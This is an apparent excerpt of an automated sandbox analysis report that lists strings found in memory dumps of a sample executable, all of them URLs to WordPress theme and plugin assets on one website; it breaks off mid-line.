                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.trans
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.utils
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/dist/js/browser-redirect/app.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/de.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/es.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/pt-pt.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/ru.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/zh.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme-child/style.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/animations/animations.min.css?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/animations/animations.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 